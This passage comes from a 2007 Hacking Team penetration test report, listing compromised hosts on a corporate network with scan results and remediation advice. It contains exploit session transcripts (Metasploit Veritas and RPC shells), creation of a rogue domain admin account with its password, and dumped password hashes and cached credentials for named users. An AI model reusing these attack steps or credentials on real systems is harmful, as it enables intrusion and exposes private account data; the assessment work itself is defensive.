The host was alive but no additional information could be extracted:
Warning: OS detection will be MUCH less reliable because we did not find at
least 1 open and 1 closed TCP port
All 1697 scanned ports on 100.100.200.254 are closed
Device type: firewall
Running: Cisco PIX 5.X|6.X
OS details: Cisco PIX Firewall (PixOS 5.2 - 6.1), Cisco PIX Firewall running PIX
6.2 - 6.3.3
OS Fingerprint:
OS:SCAN(V=4.20%D=7/14%OT=%CT=1%CU=%PV=N%G=N%TM=46988815%P=i686-pc-linux-gnu
OS:)T5(Resp=Y%DF=N%W=400%ACK=S++%Flags=AR%Ops=WNMETL)T6(Resp=Y%DF=N%W=1000%
OS:ACK=S%Flags=AR%Ops=WNMETL)T7(Resp=Y%DF=N%W=800%ACK=S++%Flags=UAPR%Ops=WN
OS:METL)PU(Resp=N)© 2007 Hacking Team
All rights reservedNumber of attachments: 0 Page 233 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
6.7 Servers in Network 100.100.100.0/24
6.7.1 100.100.100.15 [Compromised]
Rating: compromised
Vulnerabilities found: V1, V7
Risk state: High
Skill level required to exploit the vulnerability: Low
Solution: Enable authentication and implement proper authorizations, disable null sessions
Discovery method ICMP Echo Ping on Initial scan
Availability Mostly alive (Embedded/Server/Workstation)
Class Server
Vendor/OS Microsoft Windows Version Not detected
Hostname Not detected
Compromise
d
Compromised Directly Info Netbios NULL Session
Auth \\100.100.100.15 with NULL Session
The host was alive and these additional information could be extracted:
139/tcp open netbios-ssn
1417/tcp open tcpwrapped
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=64 (Good luck!)
IPID Sequence Generation: Broken little-endian incremental
The host permits Netbios sessions with NULL credentials:
Shares
C: Read only
D: Read Write
6.7.2 100.100.100.20 [Compromised]
Rating: compromised
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 234 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
Vulnerabilities found: V2, V6, V7
Risk state: High
Skill level required to exploit the vulnerability: Low
Solution: Enable authentication and implement proper authorizations, change the default
phpmyadmin/MySQLconfiguration; replace ftp with ftps
Discovery method ICMP Echo Ping on Initial scan
Availability Mostly alive (Embedded/Server/Workstation)
Class Server
Vendor/OS Linux Version Ubuntu
Hostname Not detected
Compromised Compromised Directly Info PhpMyAdmin NULL Auth
Auth http://100.100.100.20/phpmyadmin/
The host was alive and these additional information could be extracted:
21/tcp open ftp vsftpd 2.0.5
22/tcp open ssh OpenSSH 4.3p2 Debian 8ubuntu1 (protocol 2.0)
80/tcp open http Apache httpd 2.2.3 ((Ubuntu) PHP/5.2.1)
Uptime: 13.270 days (since Fri Jul 13 15:37:11 2007)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=202 (Good luck!)
IPID Sequence Generation: All zeros
Service Info: OSs: Unix, Linux
Directory listing is enabled:
HTTP/1.1 200 OK
Date: Thu, 26 Jul 2007 16:46:43 GMT
Server: Apache/2.2.3 (Ubuntu) PHP/5.2.1
Content-Length: 1838
Content-Type: text/html; charset=UTF-8
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /</title>
</head>
<body>
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 235 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
<h1>Index of /</h1>
<table><tr><th><img src="/icons/blank.gif" alt="[ICO]"></th><th><a
href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th>$
<tr><td valign="top"><img src="/icons/folder.gif" alt="[DIR]"></td><td><a
href="apache2-default/">apache2-default/</a></td><td align="right">$
<tr><td valign="top"><img src="/icons/folder.gif" alt="[DIR]"></td><td><a
href="gallery/">gallery/</a></td><td align="right">20-Dec-2006 01:2$
<tr><td valign="top"><img src="/icons/folder.gif" alt="[DIR]"></td><td><a
href="news/">news/</a></td><td align="right">26-Jul-2007 13:09 </t$
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[ ]"></td><td><a
href="phpinfo.php">phpinfo.php</a></td><td align="right">04-May-20$
<tr><td valign="top"><img src="/icons/folder.gif" alt="[DIR]"></td><td><a
href="phpmyadmin/">phpmyadmin/</a></td><td align="right">04-May-200$
<tr><td valign="top"><img src="/icons/folder.gif" alt="[DIR]"></td><td><a
href="test/">test/</a></td><td align="right">26-Jul-2007 17:17 </t$
<tr><td valign="top"><img src="/icons/folder.gif" alt="[DIR]"></td><td><a
href="xxx.captcha/">xxx.captcha/</a></td><td align="right">13-Jul-2$
<tr><th colspan="5"><hr></th></tr>
</table>
<address>Apache/2.2.3 (Ubuntu) PHP/5.2.1 Server at 100.100.100.20 Port
80</address>
</body></html>
The host permits root authentication on the present MySQL server without asking for user
credentials. In the default configuration the root user has FILE grants, permitting arbitrary file read
and write and exec on the underlying system with the permissions of the mysql user. This could
lead to a local privilege escalation.
Ftpd is a cleartext and insecure service, consider disabling it or at least replacing it with its
cryptographic counterpart.
6.7.3 100.100.100.24, 100.100.100.25, 100.100.100.27, 100.100.100.29, 100.100.100.30 [Compromised]
Rating: compromised
Vulnerabilities found: V3, V7
Risk state: High
Skill level required to exploit the vulnerability: Low
Solution: Install all available vendor updates, especially Veritas BE backup software
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 236 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
Discovery method ICMP Echo Ping on Initial scan
Availability Mostly alive (Embedded/Server/Workstation)
Class Server
Vendor/OS Microsoft Windows Version Windows Server 2003
Hostname Romwincl1n1 romwincl1n1.mtsgroup.org
Compromised Compromised Directly Info Veritas exploit
Auth Not needed
The host was alive and these additional information could be extracted:
88/tcp open kerberos-sec Microsoft Windows kerberos-sec
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn
389/tcp open ldap Microsoft LDAP server
445/tcp open microsoft-ds Microsoft Windows 2003 microsoft-ds
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
1025/tcp open msrpc Microsoft Windows RPC
1027/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
1067/tcp open msrpc Microsoft Windows RPC
1248/tcp open nsclient Netsaint Windows Client
2301/tcp open http Compaq Diagnostis httpd (CompaqHTTPServer 5.91)
3268/tcp open ldap Microsoft LDAP server
3269/tcp open tcpwrapped
3389/tcp open microsoft-rdp Microsoft Terminal Service
6106/tcp open msrpc Microsoft Windows RPC
10000/tcp open backupexec Veritas Backup Exec 9.0
49400/tcp open http Compaq Diagnostis httpd (CompaqHTTPServer 5.91)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=262 (Good luck!)
IPID Sequence Generation: Incremental
Service Info: OS: Windows
This host is a Windows Active Directory Domain Controller.
This host is vulnerable to a critical bug in the Veritas management software allowing remote users
to gain SYSTEM privileges:
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 237 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
Exploit target:
Id Name
-- ----
0 Veritas BE 9.0/9.1/10.0 (All Windows)
msf exploit(remote_agent) > exploit
[*] Started bind handler
[*] Trying target Veritas BE 9.0/9.1/10.0 (All Windows)...
[*] Sending authentication request...
[*] Command shell session 1 opened (10.10.10.1:59848 -> 100.100.100.25:4444)
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
C:\Program Files\VERITAS\Backup Exec\NT\Data>ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter Cluster Network:
Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 10.0.0.1
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . :
Ethernet adapter Roma Network:
Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 100.100.100.30
Subnet Mask . . . . . . . . . . . : 255.255.255.0
IP Address. . . . . . . . . . . . : 100.100.100.29
Subnet Mask . . . . . . . . . . . : 255.255.255.0
IP Address. . . . . . . . . . . . : 100.100.100.27
Subnet Mask . . . . . . . . . . . : 255.255.255.0
IP Address. . . . . . . . . . . . : 100.100.100.24
Subnet Mask . . . . . . . . . . . : 255.255.255.0
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 238 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
IP Address. . . . . . . . . . . . : 100.100.100.25
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 100.100.100.254
C:\>vol
vol
Volume in drive C is DiskC
Volume Serial Number is 8421-FCDD
D:\>net group "Domain Admins"
net group "Domain Admins"
Group name Domain Admins
Comment Designated administrators of the domain
Members
-----------------------------------------------------------------------------
Administrator lgrandini_a lmeneghesso_a
mbiazzo_a mts-ldadmin nwells_a
sbhular_a websense_ad
The command completed successfully.
D:\>net user /ADD MTSWriter t3-st.st.4n-ge
net user /ADD MTSWriter t3-st.st.4n-ge
The command completed successfully.
D:\>net localgroup administrators /add MTSWriter
net localgroup administrators /add MTSWriter
The command completed successfully.
D:\>NET GROUP "Domain Admins" MTSWriter /ADD
NET GROUP "Domain Admins" MTSWriter /ADD
The command completed successfully.
D:\>net group "Domain Admins"
net group "Domain Admins"
Group name Domain Admins
Comment Designated administrators of the domain
Members
-----------------------------------------------------------------------------
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 239 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
Administrator lgrandini_a lmeneghesso_a
mbiazzo_a mts-ldadmin MTSWriter
nwells_a sbhular_a websense_ad
The command completed successfully.
D:\>net group "Enterprise Admins" MTSWriter /ADD
net group "Enterprise Admins" MTSWriter /ADD
The command completed successfully.
3588 password hashes were retrieved, for the full list see Appendix A. The use of LM hashing
algorithm permitted an easy recovery to plain text passwords:
Administrator:500:NO PASSWORD*********************:A58D6B274B9B6B95A8E6541ED59209C2:::
Administrator_history_0:500:NO PASSWORD*********************:21042AF9036C47AA559AC2997BD3EA26:::
Administrator_history_1:500:BAD46F99BA178C94E72C57EF50F76A05:9FEC52907E16A15AB68EB3A08BF771A0:::
Administrator_history_2:500:F0D412BD764FFE81AAD3B435B51404EE:209C6174DA490CAEB422F3FA5A7AE634:::
Guest:501:NO PASSWORD*********************:NO PASSWORD*********************:::
krbtgt:502:NO PASSWORD*********************:9D35FF168FF67B8C70F379DE920ABE99:::
SUPPORT_388945a0:1001:NO PASSWORD*********************:D093980FBF1029BABAEBF3C3939BFC4F:::
MBiazzo:1117:E99CE0624570AA3E8746364B7707353E:C758BD0B13FFB24B97C86200EEB4423B:::
MBiazzo_history_0:1117:2435767FBFBBE54D38F1BD35B0E0ED9F:1FAD329B48923AD865FC60A3FE9645DA:::
MBiazzo_history_1:1117:3565FDCD4DBF91F37C00CF191F9EDF0D:A4DB0316057C81D5FF56649599495620:::
MBiazzo_history_2:1117:87A9E6A985D79501C5F9569729112478:4B6967ADA91AB8D236D12E83D8A5D54C:::
MBiazzo_history_3:1117:ED7AD0B70E1BD877B09321E47427AF3C:6222F5CAB8C06CE59E793690B01C376E:::
MBiazzo_history_4:1117:E1080B71A85EB92FB3A23F4730883E44:2B6E4A6D81B9638AA8800A52E5B5CCD3:::
MBiazzo_history_5:1117:B31502C3E0BA6CDDC1B15A8A5C95F311:E4B0FFABA19A68E61EB227D4E1F5CAAD:::
MBiazzo_history_6:1117:2435767FBFBBE54DAB61A730B43864A6:8740A65D814E586CAFC47A48FAB8E388:::
MBiazzo_history_7:1117:B70F66F54FB3A740638D466101C3ED82:DA4FD8B5D8D7BDA5A433E7E03E6032BC:::
MBiazzo_history_8:1117:56338CC338EC5D04C505A3CABF799431:DF8E0BBBAEFBECCD000C2DB68F80676F:::
MBiazzo_history_9:1117:ECBB7616C6626CB83EBDEC852BF05D53:0E608E3AF0EBA81C942E4245394A9320:::
MBiazzo_history_10:1117:442C1B9A5EB6DDF71AA818381E4E281B:FBBBA816CE7B78324AFF49ECBEE69531:::
6.7.4 100.100.100.28 [Compromised]
Rating: compromised
Vulnerabilities found: V2
Risk state: High
Skill level required to exploit the vulnerability: Low
Solution: Change the default passwords, especially the ones used for the HP JetAdmin Web Interface
Discovery method ICMP Echo Ping on Initial scan
Availability Mostly alive (Embedded/Server/Workstation)
Class Network
Vendor/OS Microsoft Windows Version Not detected
Hostname Not detected
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 240 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
Compromise
d
Compromised Directly Info Weak password
Auth admin:(null)@https://100.100.100.28:8443/
The host was alive and these additional information could be extracted:
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
1025/tcp open msrpc Microsoft Windows RPC
1417/tcp open tcpwrapped
8000/tcp open http HP Web Jetadmin print server 2.0.54 ((Win32)
mod_auth_sspi/1.0.1 mod_ssl/2.0.54 OpenSSL/0.9.6m)
8443/tcp open ssl/http HP Web Jetadmin print server 2.0.54 ((Win32)
mod_auth_sspi/1.0.1 mod_ssl/2.0.54 OpenSSL/0.9.6m)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=258 (Good luck!)
IPID Sequence Generation: Busy server or unknown class
Service Info: OS: Windows; Device: print server
It was possible to login in the HP Web Jetadmin by tying a default password set.
6.7.5 100.100.100.50 [Compromised]
Rating: compromised
Vulnerabilities found: V2, V4, V6
Risk state: High
Skill level required to exploit the vulnerability: Low
Solution: Change all default passwords; update firmware to the latest version available; consider replacing
telnet with telnets or SSH
Discovery method ICMP Echo Ping on Initial scan
Availability Mostly alive (Embedded/Server/Workstation)
Class Network
Vendor/OS 3com Version Switch 3300MM
Hostname Not detected
Compromised Compromised directly Info Weak password
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 241 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
Auth http://monitor:[email protected]/
The host was alive and these additional information could be extracted:
23/tcp open telnet-ssl telnetd-ssl
80/tcp open http 3Com switch webadmin 1.0
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=0 (Trivial joke)
IPID Sequence Generation: Incremental
TCP Sequence number generation seems to be extremely weak allowing MITM attacks.
It was possible to login in the administration by tying a default password set.
Telnetd is an insecure service, use SSH v2 or at last telnet-ssl. Disable the service if not needed.
6.7.6 100.100.100.26 [Unsafe]
Rating: unsafe
Vulnerabilities found: V9
Risk state: High
Skill level required to exploit the vulnerability: Low
Solution: Recheck the Active Directory domain logon policies and trust relationships
Discovery method ICMP Echo Ping on Initial scan
Availability Mostly alive (Embedded/Server/Workstation)
Class Server
Vendor/OS Microsoft Windows Version Windows Server 2003
Hostname Romwincl1n2 romwincl1n2.mtsgroup.org
Compromised Part of AD Domain Info Domain user
Auth Not needed
The host was alive and these additional information could be extracted:
53/tcp open domain Microsoft DNS
88/tcp open kerberos-sec Microsoft Windows kerberos-sec
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn
389/tcp open ldap Microsoft LDAP server
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 242 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
445/tcp open microsoft-ds Microsoft Windows 2003 microsoft-ds
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
1025/tcp open msrpc Microsoft Windows RPC
1027/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
1248/tcp open nsclient Netsaint Windows Client
2301/tcp open http HP Proliant System Management 2.0.2.106
(CompaqHTTPServer 9.9)
3389/tcp open microsoft-rdp Microsoft Terminal Service
38292/tcp open landesk-cba?
49400/tcp open http Compaq Diagnostis httpd (CompaqHTTPServer 5.91)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=258 (Good luck!)
IPID Sequence Generation: Incremental
Service Info: OS: Windows
This host is a Windows Active Directory Domain Controller.
It was possible to gain Administrator privileges on the host using a Domain User with the right
privileges.
6.7.7 100.100.100.124 [Unsafe]
Rating: unsafe
Vulnerabilities found: V4, V6
Risk state: High
Skill level required to exploit the vulnerability: Low
Solution: Update firmware/OS to the latest version available; consider replacing telnet with telnets or SSH
and ftp with ftps
Discovery method ICMP Echo Ping on Initial scan
Availability Mostly alive (Embedded/Server/Workstation)
Class Embedded
Vendor/OS Linux Version TANDBERG F1.2 PAL
Hostname Not detected
Compromised No Info None
Auth Not detected
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 243 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
The host was alive and these additional information could be extracted:
21/tcp open ftp oftpd
23/tcp open telnet BladeCenter or TANDBERG Codec telnetd
57/tcp open telnet BladeCenter or TANDBERG Codec telnetd
80/tcp open http?
1720/tcp open H.323/Q.931?
TCP Sequence Prediction: Difficulty=0 (Trivial joke)
IPID Sequence Generation: Incremental
Service Info: OS: Unix
TCP Sequence number generation seems to be extremely weak allowing MITM attacks.
Telnetd and ftpd are cleartext and insecure services, consider disabling them or at least replacing
them with their cryptographic counterparts.
6.8 Workstation
The network and service scans revealed a network (192.168.254.0/24) with 44 servers and a network
(192.168.244.0/24) with 6 servers. Other 49 servers have been identified in the remaining four internal
networks. To distinguish a server from a workstation we used, when possible, the uptime, the OS version
installed, the services installed on the host and the continous availability of the host on the network.
We considered as being servers also the network appliances like 3Com switches, Cisco routers, PIX and
Checkpoint firewalls.
The total was 99 servers and 46 of them are rated critical or unsafe.
For each internal network, we first list the critical and unsafe ones and then the safe ones.
6.9 Workstations in Network 192.168.254.0/24
No workstations have been identified in this network.
6.10 Workstations in Network 192.168.244.0/24
No workstations have been identified in this network.
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 244 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
6.11 Workstations in Network 192.168.210.0/24
6.11.1 192.168.210.117 [Compromised]
Rating: compromised
Vulnerabilities found: V5
Risk state: High
Skill level required to exploit the vulnerability: Low
Solution: Install all vendor updates
Discovery method ICMP Echo Ping on Initial scan
Availability Mostly alive (Embedded/Server/Workstation)
Class Workstation
Vendor/OS Microsoft Windows Version Windows 2000
Hostname LONTEST0103 PFRACCARO
Compromised Compromised Directly Info Microsoft RPC
Auth MTSWriter:t3-st.st.4n-ge
The host was alive and these additional information could be extracted:
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
9535/tcp open man?
12345/tcp open NetBus?
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=264 (Good luck!)
IPID Sequence Generation: Incremental
Service Info: OS: Windows
An outdated version of Windows 2000 contains a critical vulnerability in the RPC service allowing
remote users to gain SYSTEM access:
msf > sessions -i 4
[*] Starting interaction with 4...
Microsoft Windows 2000 [Version 5.00.2195]
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 245 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
(C) Copyright 1985-2000 Microsoft Corp.
C:\WINNT\system32>ipconfig
ipconfig
Windows 2000 IP Configuration
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . : mtsgroup.org
IP Address. . . . . . . . . . . . : 192.168.210.117
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.210.1
C:\WINNT\system32>vol
vol
Volume in drive C has no label.
Volume Serial Number is 809F-757C
C:\>dir
dir
Volume in drive C has no label.
Volume Serial Number is 809F-757C
Directory of C:\
14/11/2003 18:37 2,080 artpdbg.log
12/07/2007 14:43 <DIR> Documents and Settings
22/11/2004 10:52 <DIR> namprod
31/05/2007 08:25 <DIR> namtest
12/02/2003 12:03 13,684 PkgClnup.log
18/07/2007 10:37 <DIR> Program Files
16/07/2007 10:56 287 push.log
20/02/2007 11:18 13,345 s1n8.5
20/07/2006 08:30 <DIR> TEMP
18/07/2007 10:37 <DIR> WINNT
4 File(s) 29,396 bytes
6 Dir(s) 560,939,008 bytes free
C:\>
C:\>net user /ADD MTSWriter t3-st.st.4n-ge
net user /ADD MTSWriter t3-st.st.4n-ge
The command completed successfully.
C:\>net localgroup administrators /add MTSWriter
net localgroup administrators /add MTSWriter
The command completed successfully.
C:\TEMP>dir
dir
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 246 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
Volume in drive C has no label.
Volume Serial Number is 809F-757C
Directory of C:\TEMP
20/07/2007 05:01 <DIR> .
20/07/2007 05:01 <DIR> ..
20/07/2007 04:07 114,735 cryptcat.exe
07/06/2007 11:56 32,768 imokav.exe
07/06/2007 11:56 49,152 lstarget.dll
21/06/2007 12:14 192,512 PwDump.exe
20/02/2004 14:10 65,536 pwhist.exe
5 File(s) 454,703 bytes
2 Dir(s) 560,472,064 bytes free
C:\TEMP>PwDump.exe 127.0.0.1
PwDump.exe 127.0.0.1
Current directory for pwdump is C:\TEMP
Using pipe {4F60D124-6E60-4AB4-A616-306790159F61}
Key length is 16
Administrator:500:DE39D9281C64F167AA04C9CC30235CD8:6989028A536C2794CFC5E88A61849
04D:::
Guest:501:NO PASSWORD*********************:NO PASSWORD*********************:::
MTSWriter:1002:19FB4918FC87D8B37A8136F95E7B19C9:A9DA2A499B194C6606F345744C318AAE
:::
sbhular:1001:3EDEF7AB46B20FAF877D8C5FF319F4AF:265DE38958E75D68CA7BD5AF66230DD6::
:
Completed.
pwdump6 Version 1.6.0 by fizzgig and the mighty group at foofus.net
Copyright 2007 foofus.net
This program is free software under the GNU
General Public License Version 2 (GNU GPL), you can redistribute it and/or
modify it under the terms of the GNU GPL, as published by the Free Software
Foundation. NO WARRANTY, EXPRESSED OR IMPLIED, IS GRANTED WITH THIS
PROGRAM. Please see the COPYING file included with this program
and the GNU GPL for further details.
C:\TEMP>pwhist.exe
pwhist.exe
pwhist v0.96b, (C)2003 [email protected]
----------------------------------------
Administrator(current):500:de39d9281c64f167aa04c9cc30235cd8:6989028a536c2794cfc5
e88a6184904d:::
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 247 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
Guest(current):501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c0
89c0:::
MTSWriter(current):1002:19fb4918fc87d8b37a8136f95e7b19c9:a9da2a499b194c6606f3457
44c318aae:::
MTSWriter(hist_01):1002:19fb4918fc87d8b37a8136f95e7b19c9:a9da2a499b194c6606f3457
44c318aae:::
sbhular(current):1001:3edef7ab46b20faf877d8c5ff319f4af:265de38958e75d68ca7bd5af6
6230dd6:::
C:\TEMP>cachedump.exe
cachedump.exe
sbhular:66B23AC2ACB68428F5CDFF66CF400CCC:mts:
bloomberg:CDA5D3455F05BF4828154EFD1B9E9B1C:mts:
blpuk:E236C7F1C4152C2AEDF0B35394DDA848:mts:
pfraccaro:1DF90CC05E510DB230DB583E92928238:mtsgroup:
tdigrazia:F81253BD76E98F1CA753893F8EFA9189:mtsgroup:
lredgwell_a:1EF8EACE0DF0F44656C240188ABC15AF:mtsgroup:
prakotovao:2C503A4BB5BA7A97DECBB09BD9D43434:mtsgroup:
nwells_a:C781A4267D5B246825EA692F8231ACF1:mtsgroup:
6.11.2 192.168.210.181 [Compromised]
Rating: compromised
Vulnerabilities found: V5
Risk state: High
Skill level required to exploit the vulnerability: Low
Solution: Install all vendor updates
Discovery method ICMP Echo Ping on Initial scan
Availability Mostly alive (Embedded/Server/Workstation)
Class Workstation
Vendor/OS Microsoft Windows Version Windows 2000
Hostname OC0067 OCLARK
Compromised Compromised Directly Info Microsoft RPC
Auth MTSWriter:t3-st.st.4n-ge
The host was alive and these additional information could be extracted:
135/tcp open msrpc Microsoft Windows RPC
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 248 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
139/tcp open netbios-ssn
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=264 (Good luck!)
IPID Sequence Generation: Incremental
Service Info: OS: Windows
An outdated version of Windows 2000 contains a critical vulnerability in the RPC service allowing
remote users to gain SYSTEM access:
msf > sessions -i 5
[*] Starting interaction with 5...
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\WINNT\system32>vol
vol
Volume in drive C is Windows
Volume Serial Number is 1494-2250
C:\WINNT\system32>ipconfig
ipconfig
Windows 2000 IP Configuration
Ethernet adapter Bluetooth Network:
Media State . . . . . . . . . . . : Cable Disconnected
Ethernet adapter Local Area Connection 2:
Connection-specific DNS Suffix . : mtsgroup.org
IP Address. . . . . . . . . . . . : 192.168.210.181
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.210.1
Ethernet adapter Local Area Connection:
Media State . . . . . . . . . . . : Cable Disconnected
C:\>dir
dir
Volume in drive C is Windows
Volume Serial Number is 1494-2250
Directory of C:\
01/09/2006 12:34 1,024 .rnd
16/05/2006 10:54 <DIR> dell
22/05/2006 08:49 <DIR> Documents and Settings
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 249 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
29/08/2006 17:42 <DIR> Doors
16/05/2006 11:05 <DIR> drvrtmp
21/06/2006 09:19 1,554 error.gif
12/06/2006 13:59 <DIR> My Music
30/05/2006 11:10 <DIR> Nokia
31/05/2006 15:20 <DIR> Nokia Music Manager
08/01/2007 15:36 <DIR> oclark_outlook
29/08/2006 16:03 2,403 odbcconf.log
19/07/2007 14:48 <DIR> Program Files
16/05/2006 15:08 307 push.log
30/11/2006 16:42 650 synclog.txt
25/05/2006 11:25 3 TCPCheckResult.txt
04/12/2006 12:15 <DIR> unzipped
20/07/2007 01:09 <DIR> WINNT
6 File(s) 5,941 bytes
11 Dir(s) 21,398,888,448 bytes free
C:\>net user /ADD MTSWriter t3-st.st.4n-ge
net user /ADD MTSWriter t3-st.st.4n-ge
The command completed successfully.
C:\>net localgroup administrators /add MTSWriter
net localgroup administrators /add MTSWriter
The command completed successfully.
C:\TEMP>dir
dir
Volume in drive C is Windows
Volume Serial Number is 1494-2250
Directory of C:\TEMP
20/07/2007 05:28 <DIR> .
20/07/2007 05:28 <DIR> ..
20/07/2007 04:07 114,735 cryptcat.exe
07/06/2007 11:56 32,768 imokav.exe
07/06/2007 11:56 49,152 lstarget.dll
21/06/2007 12:14 192,512 PwDump.exe
20/02/2004 14:10 65,536 pwhist.exe
5 File(s) 454,703 bytes
2 Dir(s) 21,398,384,640 bytes free
C:\TEMP>PwDump.exe 127.0.0.1
PwDump.exe 127.0.0.1
Current directory for pwdump is C:\TEMP
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 250 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
Using pipe {838A0B9C-9EBE-4D83-8012-5BDF28864820}
Key length is 16
Administrator:500:DE39D9281C64F167AA04C9CC30235CD8:6989028A536C2794CFC5E88A61849
04D:::
ASPNET:1002:85CC6687F04655E728B544D96FBACBF1:6FC1D44503F3553692A579D96FB300A3:::
